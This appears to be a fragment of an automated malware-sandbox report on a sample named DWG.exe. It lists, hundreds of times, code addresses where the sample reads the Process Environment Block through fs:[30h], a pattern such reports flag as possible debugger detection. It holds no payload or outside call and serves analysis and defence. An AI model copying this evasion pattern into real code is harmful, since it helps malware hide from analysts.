          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h]5_2_00A752A5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h]5_2_00A752A5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]5_2_00A8AAB0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]5_2_00A8AAB0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAFAB0 mov eax, dword ptr fs:[00000030h]5_2_00AAFAB0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAD294 mov eax, dword ptr fs:[00000030h]5_2_00AAD294
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAD294 mov eax, dword ptr fs:[00000030h]5_2_00AAD294
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2AE4 mov eax, dword ptr fs:[00000030h]5_2_00AA2AE4
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2ACB mov eax, dword ptr fs:[00000030h]5_2_00AA2ACB
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]5_2_00A9A229
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]5_2_00A9A229
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]5_2_00A9A229
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]5_2_00A9A229
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]5_2_00A9A229
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]5_2_00A9A229
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]5_2_00A9A229
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]5_2_00A9A229
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]5_2_00A9A229
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB4A2C mov eax, dword ptr fs:[00000030h]5_2_00AB4A2C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB4A2C mov eax, dword ptr fs:[00000030h]5_2_00AB4A2C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A88A0A mov eax, dword ptr fs:[00000030h]5_2_00A88A0A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3AA16 mov eax, dword ptr fs:[00000030h]5_2_00B3AA16
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3AA16 mov eax, dword ptr fs:[00000030h]5_2_00B3AA16
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7AA16 mov eax, dword ptr fs:[00000030h]5_2_00A7AA16
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7AA16 mov eax, dword ptr fs:[00000030h]5_2_00A7AA16
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A93A1C mov eax, dword ptr fs:[00000030h]5_2_00A93A1C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A75210 mov eax, dword ptr fs:[00000030h]5_2_00A75210
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A75210 mov ecx, dword ptr fs:[00000030h]5_2_00A75210
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A75210 mov eax, dword ptr fs:[00000030h]5_2_00A75210
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A75210 mov eax, dword ptr fs:[00000030h]5_2_00A75210
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB927A mov eax, dword ptr fs:[00000030h]5_2_00AB927A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B2B260 mov eax, dword ptr fs:[00000030h]5_2_00B2B260
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B2B260 mov eax, dword ptr fs:[00000030h]5_2_00B2B260
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B48A62 mov eax, dword ptr fs:[00000030h]5_2_00B48A62
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3EA55 mov eax, dword ptr fs:[00000030h]5_2_00B3EA55
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h]5_2_00A79240
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h]5_2_00A79240
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h]5_2_00A79240
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h]5_2_00A79240
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B04257 mov eax, dword ptr fs:[00000030h]5_2_00B04257
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA4BAD mov eax, dword ptr fs:[00000030h]5_2_00AA4BAD
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA4BAD mov eax, dword ptr fs:[00000030h]5_2_00AA4BAD
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA4BAD mov eax, dword ptr fs:[00000030h]5_2_00AA4BAD
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B45BA5 mov eax, dword ptr fs:[00000030h]5_2_00B45BA5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A81B8F mov eax, dword ptr fs:[00000030h]5_2_00A81B8F
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A81B8F mov eax, dword ptr fs:[00000030h]5_2_00A81B8F
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B2D380 mov ecx, dword ptr fs:[00000030h]5_2_00B2D380
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3138A mov eax, dword ptr fs:[00000030h]5_2_00B3138A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAB390 mov eax, dword ptr fs:[00000030h]5_2_00AAB390
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2397 mov eax, dword ptr fs:[00000030h]5_2_00AA2397
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9DBE9 mov eax, dword ptr fs:[00000030h]5_2_00A9DBE9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]5_2_00AA03E2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]5_2_00AA03E2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]5_2_00AA03E2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]5_2_00AA03E2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]5_2_00AA03E2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]5_2_00AA03E2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B223E3 mov ecx, dword ptr fs:[00000030h]5_2_00B223E3
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B223E3 mov ecx, dword ptr fs:[00000030h]5_2_00B223E3
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B223E3 mov eax, dword ptr fs:[00000030h]5_2_00B223E3
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF53CA mov eax, dword ptr fs:[00000030h]5_2_00AF53CA
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF53CA mov eax, dword ptr fs:[00000030h]5_2_00AF53CA
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]5_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3131B mov eax, dword ptr fs:[00000030h]5_2_00B3131B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7DB60 mov ecx, dword ptr fs:[00000030h]5_2_00A7DB60
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA3B7A mov eax, dword ptr fs:[00000030h]5_2_00AA3B7A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA3B7A mov eax, dword ptr fs:[00000030h]5_2_00AA3B7A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7DB40 mov eax, dword ptr fs:[00000030h]5_2_00A7DB40
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B48B58 mov eax, dword ptr fs:[00000030h]5_2_00B48B58
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7F358 mov eax, dword ptr fs:[00000030h]5_2_00A7F358
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8849B mov eax, dword ptr fs:[00000030h]5_2_00A8849B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B314FB mov eax, dword ptr fs:[00000030h]5_2_00B314FB
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]5_2_00AF6CF0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]5_2_00AF6CF0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]5_2_00AF6CF0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B48CD6 mov eax, dword ptr fs:[00000030h]5_2_00B48CD6
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AABC2C mov eax, dword ptr fs:[00000030h]5_2_00AABC2C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]5_2_00AF6C0A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]5_2_00AF6C0A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]5_2_00AF6C0A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]5_2_00AF6C0A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]5_2_00B31C06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4740D mov eax, dword ptr fs:[00000030h]5_2_00B4740D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4740D mov eax, dword ptr fs:[00000030h]5_2_00B4740D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4740D mov eax, dword ptr fs:[00000030h]5_2_00B4740D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9746D mov eax, dword ptr fs:[00000030h]5_2_00A9746D
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]5_2_00AAAC7B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0C450 mov eax, dword ptr fs:[00000030h]5_2_00B0C450
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0C450 mov eax, dword ptr fs:[00000030h]5_2_00B0C450
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAA44B mov eax, dword ptr fs:[00000030h]5_2_00AAA44B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA35A1 mov eax, dword ptr fs:[00000030h]5_2_00AA35A1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B405AC mov eax, dword ptr fs:[00000030h]5_2_00B405AC
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B405AC mov eax, dword ptr fs:[00000030h]5_2_00B405AC
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]5_2_00AA1DB5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]5_2_00AA1DB5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]5_2_00AA1DB5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]5_2_00AA2581
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]5_2_00AA2581
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]5_2_00AA2581
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]5_2_00AA2581
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]5_2_00A72D8A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]5_2_00A72D8A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]5_2_00A72D8A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]5_2_00A72D8A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]5_2_00A72D8A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAFD9B mov eax, dword ptr fs:[00000030h]5_2_00AAFD9B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAFD9B mov eax, dword ptr fs:[00000030h]5_2_00AAFD9B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B28DF1 mov eax, dword ptr fs:[00000030h]5_2_00B28DF1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]5_2_00A8D5E0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]5_2_00A8D5E0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]5_2_00B3FDE2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]5_2_00B3FDE2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]5_2_00B3FDE2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]5_2_00B3FDE2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov ecx, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]5_2_00AF6DC9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B48D34 mov eax, dword ptr fs:[00000030h]5_2_00B48D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3E539 mov eax, dword ptr fs:[00000030h]5_2_00B3E539
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA4D3B mov eax, dword ptr fs:[00000030h]5_2_00AA4D3B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA4D3B mov eax, dword ptr fs:[00000030h]5_2_00AA4D3B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA4D3B mov eax, dword ptr fs:[00000030h]5_2_00AA4D3B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7AD30 mov eax, dword ptr fs:[00000030h]5_2_00A7AD30
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AFA537 mov eax, dword ptr fs:[00000030h]5_2_00AFA537
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A83D34 mov eax, dword ptr fs:[00000030h]5_2_00A83D34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9C577 mov eax, dword ptr fs:[00000030h]5_2_00A9C577
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9C577 mov eax, dword ptr fs:[00000030h]5_2_00A9C577
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB3D43 mov eax, dword ptr fs:[00000030h]5_2_00AB3D43
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF3540 mov eax, dword ptr fs:[00000030h]5_2_00AF3540
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B23D40 mov eax, dword ptr fs:[00000030h]5_2_00B23D40
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A97D50 mov eax, dword ptr fs:[00000030h]5_2_00A97D50
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AF46A7 mov eax, dword ptr fs:[00000030h]5_2_00AF46A7
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B40EA5 mov eax, dword ptr fs:[00000030h]5_2_00B40EA5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B40EA5 mov eax, dword ptr fs:[00000030h]5_2_00B40EA5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B40EA5 mov eax, dword ptr fs:[00000030h]5_2_00B40EA5
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B0FE87 mov eax, dword ptr fs:[00000030h]5_2_00B0FE87
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA16E0 mov ecx, dword ptr fs:[00000030h]5_2_00AA16E0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A876E2 mov eax, dword ptr fs:[00000030h]5_2_00A876E2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B48ED6 mov eax, dword ptr fs:[00000030h]5_2_00B48ED6
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA36CC mov eax, dword ptr fs:[00000030h]5_2_00AA36CC
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB8EC7 mov eax, dword ptr fs:[00000030h]5_2_00AB8EC7
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B2FEC0 mov eax, dword ptr fs:[00000030h]5_2_00B2FEC0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7E620 mov eax, dword ptr fs:[00000030h]5_2_00A7E620
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B2FE3F mov eax, dword ptr fs:[00000030h]5_2_00B2FE3F
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7C600 mov eax, dword ptr fs:[00000030h]5_2_00A7C600
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7C600 mov eax, dword ptr fs:[00000030h]5_2_00A7C600
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7C600 mov eax, dword ptr fs:[00000030h]5_2_00A7C600
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA8E00 mov eax, dword ptr fs:[00000030h]5_2_00AA8E00
